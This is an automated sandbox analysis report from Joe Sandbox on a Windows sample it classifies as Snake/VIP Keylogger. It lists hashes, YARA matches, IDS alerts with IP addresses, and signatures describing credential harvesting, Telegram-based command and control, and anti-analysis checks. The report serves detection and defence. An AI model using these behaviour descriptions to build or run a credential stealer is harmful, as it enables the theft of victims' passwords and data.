Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe

Overview

General Information

Sample name:173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Analysis ID:1562938
MD5:17fde190e651aee3335ed55eeaa1a6db
SHA1:8bb498b5d6fc4a58043d9e51d80790083cecd1f7
SHA256:a7e6101a68d513260f4e380b8d9bc66f90cee222d6ef157201884f6f32ce4cf3
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 4D 88 44 24 2B 88 44 24 2F B0 4F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x36591:$a1: get_encryptedPassword
          • 0x36565:$a2: get_encryptedUsername
          • 0x36629:$a3: get_timePasswordChanged
          • 0x36541:$a4: get_passwordField
          • 0x365a7:$a5: set_encryptedPassword
          • 0x36374:$a7: get_logins
          • 0x31c0c:$a10: KeyLoggerEventArgs
          • 0x31bdb:$a11: KeyLoggerEventArgsEventHandler
          • 0x36448:$a13: _encryptedPassword
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 4D 88 44 24 2B 88 44 24 2F B0 4F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.0.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 4D 88 44 24 2B 88 44 24 2F B0 4F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 75 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-26T09:46:58.437508+010028033053Unknown Traffic192.168.2.749701104.21.67.152443TCP
                2024-11-26T09:47:09.057527+010028033053Unknown Traffic192.168.2.749718104.21.67.152443TCP
                2024-11-26T09:47:20.265217+010028033053Unknown Traffic192.168.2.749754104.21.67.152443TCP
                2024-11-26T09:47:23.570571+010028033053Unknown Traffic192.168.2.749761104.21.67.152443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-26T09:46:53.806454+010028032742Potentially Bad Traffic192.168.2.749699132.226.8.16980TCP
                2024-11-26T09:46:56.759609+010028032742Potentially Bad Traffic192.168.2.749699132.226.8.16980TCP
                2024-11-26T09:47:00.103356+010028032742Potentially Bad Traffic192.168.2.749702132.226.8.16980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeReversingLabs: Detection: 50%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49700 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49767 version: TLS 1.2
                Source: Binary string: _.pdb source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C0D0Fh0_2_061C0B30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C1699h0_2_061C0B30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C2834h0_2_061C2580
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C2DE8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CE0DCh0_2_061CDE30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0676
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CE534h0_2_061CE288
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CE98Ch0_2_061CE6E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CEDE4h0_2_061CEB38
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CF23Ch0_2_061CEF90
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CF694h0_2_061CF3E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0856
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CFAECh0_2_061CF840
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CCF7Ch0_2_061CCCD0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C3134
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CD3D4h0_2_061CD128
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CD82Ch0_2_061CD580
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C2DDE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 061CDC84h0_2_061CD9D8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B8320h0_2_063B7FE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B96F3h0_2_063B9420
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BCCF1h0_2_063BCA20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B1CFCh0_2_063B1A50
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BED19h0_2_063BEA48
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BD189h0_2_063BCEB8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B2154h0_2_063B1EA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B712Ch0_2_063B6E80
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B4D2Ch0_2_063B4A80
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BF1B1h0_2_063BEEE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B7584h0_2_063B72D8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B5184h0_2_063B4ED8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B79DCh0_2_063B7730
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B55DCh0_2_063B5330
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B25ACh0_2_063B2300
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BF649h0_2_063BF378
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B2A04h0_2_063B2758
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BD621h0_2_063BD350
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B2E5Ch0_2_063B2BB0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B7E34h0_2_063B7B88
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B5A34h0_2_063B5788
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BDAB9h0_2_063BD7E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B5E8Ch0_2_063B5BE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BBA91h0_2_063BB7C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B62E4h0_2_063B6038
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BFAE1h0_2_063BF810
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B32B4h0_2_063B3008
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B370Ch0_2_063B3460
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BBF29h0_2_063BBC58
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B02ECh0_2_063B0040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B3B64h0_2_063B38B8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B0744h0_2_063B0498
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B673Ch0_2_063B6490
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BDF51h0_2_063BDC80
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B0B9Ch0_2_063B08F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BC3C1h0_2_063BC0F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B6B96h0_2_063B68E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then mov esp, ebp0_2_063BB122
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BE3E9h0_2_063BE118
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B0FF4h0_2_063B0D48
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BE881h0_2_063BE5B0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B144Ch0_2_063B11A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063BC859h0_2_063BC588
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 063B18A4h0_2_063B15F8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06426882h0_2_06426510
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06426EB3h0_2_06426BB8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06420311h0_2_06420040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642E63Bh0_2_0642E340
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06425A19h0_2_06425748
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06427843h0_2_06427548
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06424321h0_2_06424050
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642A34Bh0_2_0642A050
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642CE53h0_2_0642CB58
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06422C29h0_2_06422958
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642F95Bh0_2_0642F660
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06422312h0_2_06422068
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06428B63h0_2_06428868
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06420C41h0_2_06420970
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642B66Bh0_2_0642B370
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642E173h0_2_0642DE78
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06426349h0_2_06426078
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642BFFBh0_2_0642BD00
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064210D9h0_2_06420E08
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642EB03h0_2_0642E808
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06427D0Bh0_2_06427A10
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064250EAh0_2_06424E18
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642A813h0_2_0642A518
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064239F1h0_2_06423720
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642D31Bh0_2_0642D020
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642902Bh0_2_06428D30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06421A09h0_2_06421738
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 0642BB33h0_2_0642B838
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 06422791h0_2_064224C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 4x nop then jmp 064299BBh0_2_064296C0
